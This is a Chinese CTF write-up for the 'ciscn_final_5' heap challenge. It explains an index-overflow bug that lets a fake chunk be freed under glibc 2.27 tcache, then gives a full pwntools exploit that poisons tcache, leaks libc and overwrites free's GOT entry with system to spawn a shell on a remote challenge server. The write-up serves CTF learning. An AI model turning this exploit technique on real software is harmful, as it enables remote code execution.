ciscn_final_5

首先，检查一下程序的保护机制

然后，我们用IDA分析一下

程序将下标存储到了堆地址的低4位里

[操作的时候再清除低4位地址值。]{.mark}

问题就在于当index为16的时候，低4位已经无法表示了，这就造成了溢出

[假如我的堆地址为0x10，我的index为16，那么，经过运算，保存的地址为0x20，这样free的时候，就是free(0x20)。因此，我们可以在堆里伪造堆]{.mark}，从而把伪造的堆给free掉。又因为glibc版本为2.27，tcache 缺少很多检查，所以可以很容易free。

通过伪造size，free后进入对应size的tcache，然后申请回来，就能控制下方堆的内容了。改写下方chunk的fd为got表，修改got表为system地址，即可完成利用。

#coding:utf8
from pwn import *

#context.log_level = 'debug'
#sh = process('./ciscn_final_5')
sh = remote('node3.buuoj.cn',29906)
elf = ELF('./ciscn_final_5')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
alarm_s = libc.sym['alarm']
alarm_got = elf.got['alarm']
free_got = elf.got['free']
puts_plt = elf.plt['puts']

def add(index,size,content):
   sh.sendlineafter('your choice:','1')
   sh.sendlineafter('index:',str(index))
   sh.sendlineafter('size:',str(size))
   sh.sendafter('content:',content)

def delete(index):
   sh.sendlineafter('your choice:','2')
   sh.sendlineafter('index:',str(index))

def edit(index,content):
   sh.sendlineafter('your choice:','3')
   sh.sendlineafter('index:',str(index))
   sh.sendafter('content:',content)

#0
add(0x10,0x10,p64(0) + p64(0x51))
#删除伪造的chunk
delete(0)
#1
add(1,0x10,'a'*0x10)
#2
add(2,0x30,'b'*0x30)
#将1放入tcache bin
delete(1)
#将伪造的chunk申请出来，控制chunk1的next指针为free的got表
add(0,0x40,'b'*0x10 + p64(alarm_got))
add(3,0x10,'c'*0x10)
#申请到alarm的got表处
add(4,0x10,'a')
#将2放入tcache bin
delete(2)
#修改2的tcache bin的next指针
edit(0,'b'*0x30 + p64(free_got))
add(5,0x30,'/bin/sh\x00')
#修改free的got表为puts的plt表
add(6,0x30,p64(puts_plt))
#泄露alarm的地址
delete(4)
sh.recv(1)
alarm_addr = (u64(sh.recv(6).ljust(8,'\x00')) & 0xFFFFFFFFFFFFFF00) + (alarm_s & 0xFF)
libc_base = alarm_addr - alarm_s
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改free的got表为system
edit(14,p64(0) + p64(system_addr))
#getshell
delete(5)